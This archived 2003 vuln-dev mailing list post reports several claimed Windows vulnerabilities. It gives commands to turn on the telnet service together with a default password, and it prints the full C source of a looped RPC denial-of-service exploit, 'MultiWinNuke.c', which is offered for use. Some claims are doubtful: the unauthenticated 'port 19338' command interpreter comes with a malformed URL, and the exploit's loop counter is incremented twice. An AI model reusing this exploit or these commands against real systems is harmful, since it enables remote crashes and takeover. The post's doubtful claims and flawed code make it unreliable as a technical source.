Next message: Discussion Lists: "Shellcode questions"
Hello, im Moshe BA from israel a.k.a Trancer and I would like to report 4-5
security bugs\vulnerabilities witch i found.
(Note: i'm sorry if my english is a bit bad, i'm an israeli after all)
I've already talked with Dave McKinney via e-mail and he refferd me to this
e-mail.
This is the talk we had:
From: Dave McKinney <dmat_private>
To: mba1at_private <mba1at_private>
Subject: RE: New Secuity Vulnerabilities (fwd)
Date: Tue, 3 Jun 2003 14:27:55 -0600 (MDT)
Trancer,
Can you send your report to the vuln-dev mailing list
(vuln-devat_private)?
Dave McKinney
Symantec
keyID: BF919DD7
key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
On Tue, 3 Jun 2003, mba1at_private wrote:
> No you don't, that's what makes it so easy to hack windows server 2003.
And
> that's the reason i want this vulnerability to be reported.
>
> Original Message:
> -----------------
> From: Dave McKinney dmat_private
> Date: Tue, 3 Jun 2003 09:05:29 -0600 (MDT)
> To: mba1at_private
> Subject: RE: New Secuity Vulnerabilities (fwd)
>
>
>
> Hmm do you need to enter the admin or other user password to access the
> command line on port 19338?
>
> Dave McKinney
> Symantec
>
> keyID: BF919DD7
> key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
>
>
> On Mon, 2 Jun 2003, mba1at_private wrote:
>
> > I preffer Trancer (over Moshe)
> > I didn't realy understand your question. please ask again but in a more
> > easyer way (after all, i'm an israeli).
> >
> > Original Message:
> > -----------------
> > From: Dave McKinney dmat_private
> > Date: Mon, 2 Jun 2003 16:34:47 -0600 (MDT)
> > To: mba1at_private, vuldbat_private
> > Subject: New Secuity Vulnerabilities (fwd)
> >
> >
> >
> > Moshe, with regards to issue #2, I am assuming you need valid
credentials
> > to access the command line interpreter on port 19338?
Now, this is the security bugs\vulnerabilities.
**********
The first one is two Windows Server 2003 security vulnerabilities
1. Windows 2003 Server has a built in Command Line Interreptor (I don't
know if this service is enabled by defult but i've tested this on 9
systems,
in 7 of them it worked), which means that you can send commands to it using
the HTTP (TCP)
method (the web browser) by trying to access the server on port 19338
like this:
http://admin@>:19338/cmd.cgi?cmd=<EnterCommandHere>
That will cause the server to run the command from the $ROOT$ drive.
Which may be either C/D/E or any other drive defined by the owner / admin
of the machine.
Note that no username or password are requierd.
2. Windows 2003 Server has a built in Telnet service (disabled by defult)
that listens to open connections on port 3382.
An attacker can exploit the first vulnerability (#1 above) and write this
commands there -
"sc config TlntSvr start= auto"
and them:
"net start TlntSvr"
then the attacker has FULL access to the system.
Only a password is requierd, and becouse i've just enabled this service,
the password is also set to defult -
Password: tlntadmn
Note that if this sevice is already enabled, the password wil be wrong
(only if the system admin changed it)
If that service is already enabled with aa other password, the attacker can
open a sharing service or any other service that can give him easy
access tot he system.
**********
The secound one is Windows NT (2000\XP\2003) ICMPv6 Flooding
This little Denial of Service attack works jst like ICMP flood but it uses
Ping6 tool (in IPv6 enabled Windows OS or an IPv6 enabled *nix OS)
This attack is also good becouse Microsoft's Internet Connection Firewall
is unable to block IPv6 traffic.
This is maybe a slow attack but effective, it is also depends on the
attacker and victim's bandwidth.
An exploit for this can be easly made, and i am working on one.
**********
This bug will make Windows XP (all editions) to crash.
Creat 122 folders one inside the other and naming them by one char' (like
'1' or '0'). now go to one before the last dir' and right click the last
folder. hover the mouse over the poped manu and the system will crash.
Stupid one but it does crash the system.
**********
This is an upgraded exploit witch will DoS and crash a remote machine using
the WinNuke.c exploit that exploits - Microsoft Windows RPC Service Denial
of Service Vulnerability
I've discoverd that you can STILL DoS and crash it even if it's patched
(with an offical M$ patch) aginst it, by simply nuking it a lot of times,
and fast.
this is the exploit (MultiWinNuke.c a.k.a FixedWinNuke.c)
### Start MultiWinNuke.c ###
/*
* Microsoft Windows NT RPC Service Denial of Service Vulnerability
*
* Orginal Code By Lion @ http://www.cnhonker.com
* Upgraded By Trancer @ http://BinaryVision.tech.nu
*
* I have notice that even after a Windows NT system is patched aginst this
vulnerability with an offical M$ update,
* an attacker can still DoS that system if he activate this exploit a lot
of times, fast.
* So I've upgraded the exploit by looping it and letting you control the
times you want to nuke a system
* (with a patched 2000\XP 250-400 times is recommended).
*
* That's it. enjoy :-)
\*
#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
char sendcode1[] =
"\x05\x00\x0b\x03\x10\x00\x00\x00\x48\x00\x00\x00\x02\x00\x00\x00"
"\xd0\x16\xd0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01\x00"
"\x60\x9e\xe7\xb9\x52\x3d\xce\x11\xaa\xa1\x00\x00\x69\x01\x29\x3f"
"\x02\x00\x02\x00\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00"
"\x2b\x10\x48\x60\x02\x00\x00\x00\x05\x00\x00\x01\x10\x00\x00\x00"
"\xd0\x16\x00\x00\x8f\x00\x00\x00\x20\x27\x01\x00\x00\x00\x02\x00"
"\xf0\x00\x00\x00\x00\x00\x00\x00\xf0\x00\x00\x00";
char sendcode2[] =
"\x88\x13\x00\x00\x00\x00\x00\x00\x88\x13\x00\x00";
char sendcode3[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00";
char sendcode4[] =
"\xfe\xff\x00\x00\x00\x00\x00\x00\xfe\xff\x00\x00\x3d\x3d\x3d\x3d"
"\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d"
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x50\x10\x01\x00\x00\x00\x02\x00";
char sendcode5[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\x80\xf9\x00\x00\x00\x00\x02\x00";
char sendcode6[] =
"\x05\x00\x00\x00\x10\x00\x00\x00\xd0\x16\x00\x00\x8f\x00\x00\x00"
"\xb0\xe2\x00\x00\x00\x00\x02\x00";
char sendcode7[] =
"\x05\x00\x00\x02\x10\x00\x00\x00\x60\x15\x00\x00\x8f\x00\x00\x00"
"\x60\x15\x00\x00\x00\x00\x02\x00";
char sendcode8[] =
"\x00\x00\x01\x10\x00\x00\x00\x00\x00\x00\x01\x10\x00\x00";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *targetip;
int port,bufsize,times,i;
SOCKET s;
char buffer[20480];
printf("======================= Windows NT Multi RPC Nuke V0.12
======================\r\n");
printf("=============== Orginal Code By Lion @ http://www.cnhonker.com
===============\r\n");
printf("============= Upgraded By Trancer @ http://BinaryVision.tech.nu
==============\r\n\n");
if (argc < 2)
{
printf("Usage:\r\n");
printf(" %s <TargetIP> <TargetPort> <BufferSize> <Times>\r\n", argv[0]);
printf("Exaple: %s 198.167.0.1 135 512 250\r\n", argv[0]);
printf("PS:\r\n");
printf(" If target is XP, try 2 times.\r\n");
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;
targetip = argv[1];
port = 135;
if (argc >= 3) port = atoi(argv[2]);
bufsize = 512;
if (argc >= 4) bufsize = atoi(argv[3]);
times = 1;
if (argc >= 5) times = atoi(argv[4]);
for (i = 0; i < times; i = i + 1)
{
s = socket(AF_INET, SOCK_STREAM, 0);
if(s==INVALID_SOCKET)
{
printf("Socket error!\r\n");
exit(1);
}
printf("Resolving Hostnames...\n");
if ((pTarget = gethostbyname(targetip)) == NULL)
{
printf("Resolve of %s failed, please try again.\n", argv[1]);
exit(1);
}
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("Connecting...\n");
if ( (connect(s, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("Couldn't connect to host.\n");
exit(1);
}
printf("Connected!...\n");
printf("Sending Packets...\n");
if (send(s, sendcode1, sizeof(sendcode1)-1, 0) == -1)
{
printf("Error sending nuke Packets\r\n");
closesocket(s);
exit(1);
}
memset(&buffer, '\x41', 240);
send(s, buffer, 240, 0);
send(s, sendcode2, sizeof(sendcode2)-1, 0);
memset(&buffer, '\x42', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode3, sizeof(sendcode3)-1, 0);
memset(&buffer, '\x43', 512);
send(s, buffer, 512, 0);
send(s, sendcode4, sizeof(sendcode4)-1, 0);
memset(&buffer, '\x44', 20480);
send(s, buffer, 20480, 0);
memset(&buffer, '\x44', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode5, sizeof(sendcode5)-1, 0);
memset(&buffer, '\x45', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode6, sizeof(sendcode6)-1, 0);
memset(&buffer, '\x46', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode7, sizeof(sendcode7)-1, 0);
memset(&buffer, '\x47', 5000);
send(s, buffer, 5000, 0);
send(s, sendcode8, sizeof(sendcode8)-1, 0);
memset(&buffer, '\x48', 5000);
send(s, buffer, 5000, 0);
i = i + 1;
}
if (times < 2)
{
printf("Nuked! If target is XP, try a again! :)\r\n");
}
else
{
printf("%s was nuked %s times\r\n", argv[1], argv[4]);
}
closesocket(s);
WSACleanup();
return 0;
}
### End MultiWinNuke.c ###
That's it. note all of the bugs above were found by me, and i'll be glad if
they will be reported.
Trancer
--------------------------------------------------------------------
mail2web - Check your email from the web at
http://mail2web.com/ .
This archive was generated by hypermail 2b30
: Wed Jun 04 2003 - 14:51:52 PDT